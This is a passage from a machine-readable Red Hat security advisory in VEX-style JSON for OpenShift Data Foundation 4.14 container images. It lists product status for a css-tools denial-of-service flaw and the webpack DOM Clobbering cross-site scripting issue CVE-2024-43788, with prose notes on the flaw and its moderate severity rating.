"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "css-tools: Improper Input Validation causes Denial of Service via Regular Expression"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
